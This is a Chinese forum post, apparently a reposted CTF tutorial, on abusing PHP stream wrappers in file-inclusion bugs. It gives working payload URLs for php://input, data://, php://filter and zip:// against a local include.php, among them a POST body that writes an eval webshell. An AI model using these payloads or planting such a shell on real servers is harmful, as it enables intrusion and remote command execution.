请选择 进入手机版 | 继续访问电脑版
查看: 190|回复: 0

php伪协议实现命令执行详情

[复制链接]

2066

主题

2066

帖子

6594

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
6594
发表于 2022-10-9 01:01:48 | 显示全部楼层 |阅读模式
1.file://协议

条件:
  1. allow_url_fopen : off/on
  2. allow_url_include: off/on
复制代码
作用:
用于访问当地文件系统,在ctf中通常用来读取当地文件
  1. include() / require() / include_once() / require_once()
复制代码
参数可控的情况下,即使导入非.php文件,如shell.txt ,依然按照php语法进行解析,这是include()函数所决定的
说明:
file:// 文件系统是php使用的默认封装协议,用于展示当地文件系统。
用法:
  1. /path/to/file.ext
  2. relative/path/to/file.ext
  3. fileInCwd.ext
  4. C:/path/to/winfile.ext
  5. C:\path\to\winfile.ext
  6. \\smbserver\share\path\to\winfile.ext
  7. file:///path/to/file.ext
复制代码
示例:
1.file://[文件的绝对路径和文件名]
  1. http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
复制代码
2.file://[文件的相对路径和文件名]
  1. http://127.0.0.1/include.php?file=./phpinfo.txt
复制代码
3.http://网络位置和文件名
  1. http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
复制代码
2.php://协议

条件:
  1. allow_url_open : off/on
  2. allow_url_include: 仅 php://input  php://stdin php://memory php://temp 需要on
复制代码
作用:
php:// 访问各个输入/输出流 (I/O streams), 在ctf中经常使用的是 php://filter 和 php://input
  1. php://filter 用于读取源码
  2. php://input 用于执行php代码
复制代码
说明:
php提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流,尺度输入输出流和错误描述符:

php://filter使用:
  1. php://filter/read=convert.base64-encode/resource=[文件名]
复制代码
php://input的使用:
  1. http://127.0.0.1/include.php?file=php://input
复制代码
  1.  [POST DATA部分]
  2. <?php phpinfo(); ?>
复制代码
写入一句话
  1. http://127.0.0.1/include.php?file=php://input
  2. [POST DATA部分]
  3. <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
复制代码
3.data://协议

作用:
php>=5.2.0 , 可以使用data://数据流封装器,以传递相应格式的数据。通常用来执行php代码
用法:
  1. data://text/plain, ???
复制代码
如:
  1. http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
复制代码
4.zip:// & bzip:// & zlib:// 协议

作用:
zip:// & bzip:// & zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可以修改为任意后缀名,如 jpg,png,gif,xxx等
示例:
1.zip://[压缩文件绝对路径]%23[压缩文件内的子文件文件名](# 的编码为 %23)
压缩 phpinfo.txt 为phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传
  1. http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
复制代码
2.compress.bzip2://file.bz2
压缩phpinfo.txt 为phpinfo.bz2 并上传(同样支持任意后缀名)
  1. http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
复制代码
3.compress.zlib://file.gz
压缩phpinfo.txt 为phpinfo.gz 并上传(支持任意后缀名)
  1. http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz
复制代码
总结

在ctf中常用的有data:// , php://input , php://filter ,file://
  1. php://input ,data://用来执行命令1.php://input 的用法http://127.0.0.1/include.php?file=php://input[POST DATA部门]<?php phpinfo(); ?>2.data://用法http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>php://filter,file://用来读取文件3.php://filter用法http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(读取php文件需要先加密以下才气读出来)http://127.0.0.1/include.php?file=php://filter/resource=/flag4.file://用法http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
复制代码
到此这篇关于php伪协议实现命令执行详情的文章就介绍到这了,更多相关php命令执行内容请搜索趣UU以前的文章或继续浏览下面的相关文章希望大家以后多多支持趣UU!

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
打赏作者
  • 0
  • 0
  • 0
  • 0
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表